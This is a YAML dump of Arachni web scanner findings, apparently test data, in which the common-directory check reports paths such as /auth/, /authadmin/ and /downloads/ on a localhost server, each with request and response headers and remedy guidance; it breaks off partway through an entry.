- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/bugs/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: bugs
    injected: bugs
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: bugs
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/bugs/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/buy/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: buy
    injected: buy
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: buy
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/buy/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/auth/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: auth
    injected: auth
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: auth
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/auth/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/authadmin/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "9"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: authadmin
    injected: authadmin
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: authadmin
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/authadmin/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/import/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: import
    injected: import
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: import
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/import/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/apps/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: apps
    injected: apps
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: apps
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/apps/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/application/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "11"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: application
    injected: application
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: application
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/application/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/access-log/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "10"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: access-log
    injected: access-log
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: access-log
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/access-log/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/catalog/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: catalog
    injected: catalog
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: catalog
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/catalog/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/cert/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: cert
    injected: cert
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: cert
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/cert/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/crypto/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: crypto
    injected: crypto
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: crypto
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/crypto/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/cfdocs/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: cfdocs
    injected: cfdocs
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: cfdocs
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/cfdocs/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/classes/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: classes
    injected: classes
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: classes
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/classes/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/cdrom/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: cdrom
    injected: cdrom
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: cdrom
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/cdrom/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/css/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: css
    injected: css
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: css
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/css/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/doc/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: doc
    injected: doc
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: doc
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/doc/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/docs/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: docs
    injected: docs
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: docs
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/docs/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/download/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: download
    injected: download
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: download
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/download/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/downloads/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "9"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: downloads
    injected: downloads
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: downloads
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/downloads/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/down/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: down
    injected: down
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: down
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/down/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
